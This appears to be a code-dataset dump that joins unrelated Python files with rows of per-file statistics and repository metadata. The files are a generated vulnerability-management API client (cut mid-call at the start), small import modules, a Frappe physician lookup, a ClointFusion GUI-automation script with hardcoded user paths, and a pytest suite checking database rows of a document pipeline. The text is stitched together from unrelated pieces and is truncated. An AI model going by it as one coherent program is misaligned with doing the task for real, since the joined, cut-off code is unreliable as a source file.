response_type='PageOfVulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
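# Note: the trailing "1" in get_vulnerability_references1 is appended by the
# code generator to avoid a clash with get_vulnerability_references above.
# This variant calls /api/3/vulnerabilities/{id}/references for a single
# vulnerability, while the other lists /api/3/vulnerability_references.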
def get_vulnerability_solutions(self, id, **kwargs): # noqa: E501
"""Vulnerability Solutions # noqa: E501
Returns all solutions (across all platforms) that may be used to remediate this vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Solutions # noqa: E501
Returns all solutions (across all platforms) that may be used to remediate this vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/solutions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithSolutionNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.701804 | 220 | 0.615526 | 11,983 | 104,046 | 5.129266 | 0.020362 | 0.053755 | 0.021866 | 0.028114 | 0.985032 | 0.983616 | 0.98059 | 0.978003 | 0.977043 | 0.971268 | 0 | 0.017741 | 0.293562 | 104,046 | 2,494 | 221 | 41.718524 | 0.818481 | 0.365579 | 0 | 0.847068 | 1 | 0 | 0.179925 | 0.069374 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036377 | false | 0 | 0.00297 | 0 | 0.093541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
60fcfa268ddd1c34f63166d26be572ed9a648ae7 | 327 | py | Python | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | ["MIT"] | 1 | 2021-07-24T02:05:01.000Z | 2021-07-24T02:05:01.000Z | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | ["MIT"] | null | null | null | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | ["MIT"] | null | null | null |
from TrainInfoProcess.src.infoExtract.AvgStopTime import calcAvgStopTime
from TrainInfoProcess.src.infoExtract.AvgTravelTime import calcAvgTravelTime
from TrainInfoProcess.src.infoExtract.AvgTravelSpeed import calcAvgTravelSpeed
from TrainInfoProcess.src.infoExtract.TrainNumberInfosExtraction import TrainNumberInfosExtraction | 81.75 | 98 | 0.917431 | 28 | 327 | 10.714286 | 0.428571 | 0.266667 | 0.306667 | 0.453333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045872 | 327 | 4 | 98 | 81.75 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
716afeaa2a7bc4928cd43415a023bedc18913687 | 208 | py | Python | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | 1 | 2021-07-14T02:36:43.000Z | 2021-07-14T02:36:43.000Z | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | null | null | null | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | 1 | 2021-02-18T11:38:52.000Z | 2021-02-18T11:38:52.000Z | # noqa: F401
from docker_monitor.checks.active_build import ActiveBuildCheck
from docker_monitor.checks.prisma_scan import PrismaScanCheck
from docker_monitor.checks.running_as_root import RunningAsRootCheck
| 41.6 | 68 | 0.889423 | 27 | 208 | 6.592593 | 0.62963 | 0.168539 | 0.286517 | 0.38764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015544 | 0.072115 | 208 | 4 | 69 | 52 | 0.906736 | 0.048077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
716c03e94cc0e92b04db8362e50f551c6521489f | 117 | py | Python | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | import frappe
def get_physician_id(physician):
    """Return the Physician document name linked to the given user id."""
return frappe.get_value("Physician", {"user_id": physician}, "name") | 29.25 | 69 | 0.769231 | 16 | 117 | 5.375 | 0.625 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08547 | 117 | 4 | 69 | 29.25 | 0.803738 | 0 | 0 | 0 | 0 | 0 | 0.169492 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
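# A hedged usage sketch for the helper above, assuming a Frappe site whose
# Physician doctype links to a User account through its user_id field; the
# email and the returned document name are placeholders:
physician_name = get_physician_id("doctor@example.com")  # e.g. "HLC-PHY-2024-00001"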
71a20576299f10bfb98c95e015afc430de7ea1d0 | 2,546 | py | Python | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | # This code is generated automatically by ClointFusion BOT Builder Tool.
import ClointFusion as cf
import time
cf.window_show_desktop()
cf.mouse_click(int(cf.pg.size()[0]/2),int(cf.pg.size()[1]/2))
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\1--566_853.png',conf=0.7, wait=12),left_or_right='right', single_double_triple = 'single')
except:
cf.mouse_click(566,853,left_or_right='right', single_double_triple = 'single')
time.sleep(2)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\2--672_603.png',conf=0.7, wait=14),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(672,603,left_or_right='left', single_double_triple = 'single')
time.sleep(4)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\3--316_1059.png',conf=0.7, wait=11),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(316,1059,left_or_right='left', single_double_triple = 'single')
time.sleep(1)
cf.key_write_enter('chr',key='')
time.sleep(1)
cf.key_press('enter')
time.sleep(3)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\4-NewTabGoogleChrome-551_94.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(551,94,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\5-NewTabGoogleChrome-551_94.png',conf=0.7, wait=11),left_or_right='left', single_double_triple = 'double')
except:
cf.mouse_click(551,94,left_or_right='left', single_double_triple = 'double')
time.sleep(1)
cf.key_write_enter('goo',key='')
time.sleep(1)
cf.key_press('right')
time.sleep(0)
cf.key_press('enter')
time.sleep(5)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\6-GoogleGoogleChrome-1919_0.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(1919,0,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
cf.window_close_windows('Google - Google Chrome') | 42.433333 | 245 | 0.779262 | 438 | 2,546 | 4.228311 | 0.194064 | 0.071814 | 0.084233 | 0.12959 | 0.845572 | 0.831533 | 0.806156 | 0.759179 | 0.674946 | 0.674946 | 0 | 0.055111 | 0.066379 | 2,546 | 60 | 246 | 42.433333 | 0.724022 | 0.027494 | 0 | 0.466667 | 1 | 0.133333 | 0.298586 | 0.231919 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.044444 | 0 | 0.044444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
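# The generated bot above repeats one idiom: search the screen for a recorded
# snip and click it, falling back to the absolute coordinates captured at
# recording time if the snip is not found. A hand-written sketch of that
# pattern (the snip path and coordinates are placeholders):
import ClointFusion as cf

try:
    x, y = cf.mouse_search_snip_return_coordinates_x_y(
        r'C:\path\to\snip.png', conf=0.7, wait=10)
    cf.mouse_click(x, y, left_or_right='left', single_double_triple='single')
except Exception:  # the generated script uses a bare except; Exception is safer
    cf.mouse_click(100, 200, left_or_right='left', single_double_triple='single')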
71a31d2893445d70ed230439bf822b73cc7d0c88 | 36,668 | py | Python | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2022-02-24T15:13:23.000Z | 2022-03-28T00:45:31.000Z | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # pylint: disable=unused-argument
"""Testing Module all."""
import cfg.cls_setup
import cfg.glob
import db.cls_action
import db.cls_db_core
import db.cls_document
import db.cls_language
import db.cls_run
import db.cls_token
import db.cls_version
import pytest
import utils
import dcr
# -----------------------------------------------------------------------------
# Constants & Globals.
# -----------------------------------------------------------------------------
# pylint: disable=C0302
# pylint: disable=W0212
# @pytest.mark.issue
# -----------------------------------------------------------------------------
# Check the database content.
# -----------------------------------------------------------------------------
def check_db_content() -> None: # pylint: disable=R0915
"""Check the database content."""
cfg.glob.db_core = db.cls_db_core.DBCore()
check_db_content_action()
check_db_content_document()
check_db_content_language()
check_db_content_run()
check_db_content_version()
# -----------------------------------------------------------------------------
# Database table language.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_language(
(
1,
(
1,
True,
"eng",
"en",
"en_core_web_trf",
"eng",
utils.get_os_independent_name("data/inbox_test"),
"English",
),
)
)
pytest.helpers.check_dbt_language(
(
2,
(
2,
True,
"deu",
"de",
"de_dep_news_trf",
"deu",
utils.get_os_independent_name("data\\inbox_test\\deutsch"),
"Deutsch",
),
)
)
pytest.helpers.check_dbt_language((3, (3, False, "fra", "fr", "fr_dep_news_trf", "fra", "", "French")))
pytest.helpers.check_dbt_language((4, (4, False, "ita", "it", "it_core_news_lg", "ita", "", "Italian")))
# -----------------------------------------------------------------------------
# Database table run.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_run((1, (1, "p_i", "inbox (preprocessor)", 1, "end", 1, 5, 6)))
pytest.helpers.check_dbt_run((2, (2, "p_2_i", "pdf2image (preprocessor)", 1, "end", 0, 2, 2)))
pytest.helpers.check_dbt_run((3, (3, "ocr", "tesseract (preprocessor)", 1, "end", 0, 0, 4)))
pytest.helpers.check_dbt_run((4, (4, "pypdf2", "pypdf2 (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((5, (5, "n_2_p", "pandoc (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((6, (6, "tet", "pdflib (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((7, (7, "s_p_j", "parser (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((8, (8, "tkn", "tokenize (nlp)", 1, "end", 0, 5, 5)))
# -----------------------------------------------------------------------------
# Database table version.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_version((1, (1, cfg.cls_setup.Setup.DCR_VERSION)))
# -----------------------------------------------------------------------------
# Check the database content - database table action.
# -----------------------------------------------------------------------------
def check_db_content_action() -> None: # pylint: disable=R0915
"""Check the database content - database table action."""
pytest.helpers.check_dbt_action(
(
1,
(
1,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"docx_ok.docx",
1,
1,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
2,
(
2,
"n_2_p",
"pandoc (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.docx",
1,
2,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
3,
(
3,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"jpeg_pdf_text_ok.jpeg",
2,
3,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
4,
(
4,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.jpeg",
2,
3,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
5,
(
5,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"pdf_scanned_ok.pdf",
3,
5,
1,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
6,
(
6,
"p_2_i",
"pdf2image (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3.pdf",
3,
5,
1,
1,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
7,
(
7,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"pdf_text_ok.pdf",
4,
7,
1,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
8,
(
8,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.pdf",
4,
7,
1,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
9,
(
9,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"No 'pdf' format",
"01.903 Issue (p_i): Runtime error with fitz.open() processing of "
+ "file 'pdf_wrong_format.pdf' - error: 'cannot open broken document'.",
1,
"pdf_wrong_format.pdf",
5,
9,
1,
0,
-1,
"error",
),
)
)
pytest.helpers.check_dbt_action(
(
10,
(
10,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02.pdf",
6,
10,
1,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
11,
(
11,
"p_2_i",
"pdf2image (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6.pdf",
6,
10,
1,
2,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
12,
(
12,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.jpeg",
3,
6,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
13,
(
13,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_1.jpeg",
6,
11,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
14,
(
14,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_2.jpeg",
6,
11,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
15,
(
15,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.pdf",
2,
4,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
16,
(
16,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.pdf",
3,
12,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
17,
(
17,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_1.pdf",
6,
13,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
18,
(
18,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_2.pdf",
6,
14,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
19,
(
19,
"pypdf2",
"pypdf2 (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.pdf",
6,
13,
3,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
20,
(
20,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.pdf",
6,
19,
4,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
21,
(
21,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.pdf",
1,
2,
5,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
22,
(
22,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.line.xml",
4,
8,
6,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
23,
(
23,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.line.xml",
2,
15,
6,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
24,
(
24,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.line.xml",
3,
16,
6,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
25,
(
25,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.line.xml",
6,
20,
6,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
26,
(
26,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.line.xml",
1,
21,
6,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
27,
(
27,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.line.json",
4,
22,
7,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
28,
(
28,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.line.json",
2,
23,
7,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
29,
(
29,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.line.json",
3,
24,
7,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
30,
(
30,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.line.json",
6,
25,
7,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
31,
(
31,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.line.json",
1,
26,
7,
0,
2,
"end",
),
)
)
# -----------------------------------------------------------------------------
# Check the database content - database table document.
# -----------------------------------------------------------------------------
def check_db_content_document() -> None: # pylint: disable=R0915
"""Check the database content - database table document."""
pytest.helpers.check_dbt_document(
(
1,
(
1,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"docx_ok.docx",
1,
8,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
2,
(
2,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"jpeg_pdf_text_ok.jpeg",
1,
8,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
3,
(
3,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"pdf_scanned_ok.pdf",
1,
8,
1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
4,
(
4,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"pdf_text_ok.pdf",
1,
8,
3,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
5,
(
5,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data\\inbox_test"),
"No 'pdf' format",
"01.903 Issue (p_i): Runtime error with fitz.open() processing of "
+ "file 'pdf_wrong_format.pdf' - error: 'cannot open broken document'.",
1,
"pdf_wrong_format.pdf",
1,
1,
-1,
"error",
),
)
)
pytest.helpers.check_dbt_document(
(
6,
(
6,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02.pdf",
1,
8,
2,
"end",
),
)
)
# -----------------------------------------------------------------------------
# Check the database content - database table language.
# -----------------------------------------------------------------------------
def check_db_content_language() -> None: # pylint: disable=R0915
"""Check the database content - database table language."""
pytest.helpers.check_dbt_language(
(
1,
(
1,
True,
"eng",
"en",
"en_core_web_trf",
"eng",
utils.get_os_independent_name("data/inbox_test"),
"English",
),
)
)
pytest.helpers.check_dbt_language(
(
2,
(
2,
True,
"deu",
"de",
"de_dep_news_trf",
"deu",
utils.get_os_independent_name("data\\inbox_test\\deutsch"),
"Deutsch",
),
)
)
pytest.helpers.check_dbt_language((3, (3, False, "fra", "fr", "fr_dep_news_trf", "fra", "", "French")))
pytest.helpers.check_dbt_language((4, (4, False, "ita", "it", "it_core_news_lg", "ita", "", "Italian")))
# -----------------------------------------------------------------------------
# Check the database content - database table run.
# -----------------------------------------------------------------------------
def check_db_content_run() -> None: # pylint: disable=R0915
"""Check the database content- database table run."""
pytest.helpers.check_dbt_run((1, (1, "p_i", "inbox (preprocessor)", 1, "end", 1, 5, 6)))
pytest.helpers.check_dbt_run((2, (2, "p_2_i", "pdf2image (preprocessor)", 1, "end", 0, 2, 2)))
pytest.helpers.check_dbt_run((3, (3, "ocr", "tesseract (preprocessor)", 1, "end", 0, 0, 4)))
pytest.helpers.check_dbt_run((4, (4, "pypdf2", "pypdf2 (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((5, (5, "n_2_p", "pandoc (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((6, (6, "tet", "pdflib (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((7, (7, "s_p_j", "parser (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((8, (8, "tkn", "tokenize (nlp)", 1, "end", 0, 5, 5)))
# -----------------------------------------------------------------------------
# Check the database content - database table version.
# -----------------------------------------------------------------------------
def check_db_content_version() -> None: # pylint: disable=R0915
"""Check the database content - database table version."""
pytest.helpers.check_dbt_version((1, (1, cfg.cls_setup.Setup.DCR_VERSION)))
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = true.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_deleted(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = true."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
("pdf_wrong_format", "pdf"),
("README", "md"),
("translating_sql_into_relational_algebra_p01_02", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
db.cls_run.Run.ID_RUN_UMBRELLA = 0
